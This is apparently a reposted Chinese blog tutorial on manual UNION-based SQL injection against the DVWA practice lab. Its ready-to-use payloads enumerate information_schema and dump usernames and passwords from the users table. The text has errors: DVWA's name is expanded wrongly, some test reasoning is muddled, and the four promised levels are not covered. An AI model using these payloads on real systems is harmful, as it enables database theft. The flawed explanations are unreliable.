博客
关于我
DVWA--SQL Injection(非盲注)--四个级别
阅读量:209 次
发布时间:2019-02-28

本文共 2372 字,大约阅读时间需要 7 分钟。

SQL 注入测试与渗透:DVWA 框架下的手动注入流程

SQL 注入是一种Web安全中的常见漏洞,攻击者通过向应用程序中输入恶意的SQL语句,破坏现有的查询逻辑,从而执行恶意操作。SQL注入漏洞能够导致数据库信息泄露、数据篡改甚至整个数据库的“脱库”,因此被广泛认为是Web安全中的高风险问题。

本文将基于DVWA( Dependency-Conflict Vulnerability Assessment )框架,逐步讲解手动SQL注入测试的过程,涵盖从低级别到高级别的测试方法,以及如何利用这些漏洞进行数据库渗透。


1. 判断注入类型:数字型 vs 字符型

在手动SQL注入中,首先需要判断注入类型,即注入是基于数字型还是字符型。以下是一些常见的测试方法:

  • 数字型注入

    • 输入 1,页面正常返回,表明注入点可能存在数字型漏洞。
    • 输入 1 and 1=2,页面异常或返回错误,说明可能存在数字型注入。
    • 输入 1' and '1'='1,页面异常或返回错误,说明字符型注入可能存在。
  • 字符型注入

    • 输入 1' and '1'='1,页面正常返回,表明注入点可能存在字符型漏洞。
    • 输入 1' and '1'='2,页面异常或返回错误,说明字符型注入可能存在。

通过以上测试,可以初步判断注入类型,并为后续操作做好准备。


2. 猜解字段数量

接下来需要确定SQL查询语句中所涉及的字段数量。可以通过以下方法进行测试:

  • 使用 ORDER BY

    • 输入 1 order by 1,页面正常返回,说明至少有一个字段。
    • 输入 1 order by 2,页面正常返回,说明至少有两个字段。
    • 输入 1 order by 3,页面异常返回,说明字段数量小于3。
  • 使用 UNION SELECT

    • 输入 1 union select 1,页面异常返回,说明至少有两个字段。
    • 输入 1 union select 1,2,页面正常返回,说明至少有两个字段。
    • 输入 1 union select 1,2,3,页面异常返回,说明字段数量小于3。

通过以上方法,可以准确判断出SQL查询语句中涉及的字段数量,为后续注入操作提供依据。


3. 确定可注入字段位置

接下来需要确定哪些字段位置可以进行注入利用。可以通过以下方法实现:

  • 使用 UNION SELECT
    • 输入 1' and 1=2 union select 1,2,页面正常返回,说明两个字段位置都可以注入利用。
    • 输入 1' and 1=2 union select 1,3,页面异常返回,说明第三个字段位置不可注入。

通过观察返回的数据,可以判断哪些字段位置可以利用注入点,进而制定后续操作策略。


4. 查询当前使用的数据库

在SQL注入过程中,通常需要获取当前使用的数据库信息。可以通过以下方法实现:

  • 使用 UNION SELECT database()

    • 输入 1' and 1=2 union select database(),页面正常返回,显示当前数据库名称(如 dvwa)。
  • 查询所有数据库

    • 输入 1' and 1=2 union select table_schema from information_schema.tables,页面正常返回,列出所有数据库名称。

通过以上方法,可以获取当前使用的数据库信息,为后续操作提供重要数据支持。


5. 查询数据库中的表

在掌握数据库名称后,需要查询数据库中的所有表信息。可以通过以下方法实现:

  • 获取当前数据库中的表

    • 输入 1' and 1=2 union select table_name from information_schema.tables where table_schema=database(),页面正常返回,列出当前数据库中的所有表名称。
  • 获取所有数据库中的表

    • 输入 1' and 1=2 union select table_name from information_schema.tables,页面正常返回,列出所有数据库中的表名称。

通过以上方法,可以获取目标数据库中的表信息,为后续操作提供数据支持。


6. 查询表中的字段

在掌握表名称后,需要查询表中的字段信息。可以通过以下方法实现:

  • 获取当前表中的字段
    • 输入 1' and 1=2 union select column_name from information_schema.columns where table_name='users',页面正常返回,列出指定表中的字段名称。

通过以上方法,可以获取表中的字段信息,为后续注入操作提供重要数据支持。


7. 查询字段的具体值

在掌握字段名称后,需要查询字段的具体值。可以通过以下方法实现:

  • 获取用户信息

    • 输入 1' and 1=2 union select user_id, first_name, last_name from users,页面正常返回,列出用户信息。
  • 获取密码信息

    • 输入 1' and 1=2 union select user_id, password from users,页面正常返回,列出用户账号和密码。

通过以上方法,可以获取字段的具体值,完成数据库渗透。


8. 总结与建议

通过以上步骤,可以逐步完成SQL注入测试的整个流程。需要注意以下几点:

  • 测试环境的准备:确保测试环境的安全性,避免对生产环境造成影响。
  • 工具的选择:手动注入工具的选择可以根据具体需求进行调整,如使用 sqlmap 等自动化工具。
  • 防护措施:了解并遵守Web应用的安全最佳实践,减少SQL注入漏洞的发生概率。
  • 通过以上方法,可以在DVWA框架中安全地进行SQL注入测试,并掌握数据库渗透的关键技术。

    转载地址:http://shqi.baihongyu.com/

    你可能感兴趣的文章
    node全局对象 文件系统
    查看>>
    Node出错导致运行崩溃的解决方案
    查看>>
    Node响应中文时解决乱码问题
    查看>>
    node基础(二)_模块以及处理乱码问题
    查看>>
    node安装及配置之windows版
    查看>>
    Node实现小爬虫
    查看>>
    Node提示:error code Z_BUF_ERROR,error error -5,error zlib:unexpected end of file
    查看>>
    Node提示:npm does not support Node.js v12.16.3
    查看>>
    Node搭建静态资源服务器时后缀名与响应头映射关系的Json文件
    查看>>
    Node服务在断开SSH后停止运行解决方案(创建守护进程)
    查看>>
    node模块化
    查看>>
    node环境下使用import引入外部文件出错
    查看>>
    node编译程序内存溢出
    查看>>
    Node读取并输出txt文件内容
    查看>>
    node防xss攻击插件
    查看>>
    noi 1996 登山
    查看>>
    noi 7827 质数的和与积
    查看>>
    NOIp2005 过河
    查看>>
    NOIP2011T1 数字反转
    查看>>
    NOIP2014 提高组 Day2——寻找道路
    查看>>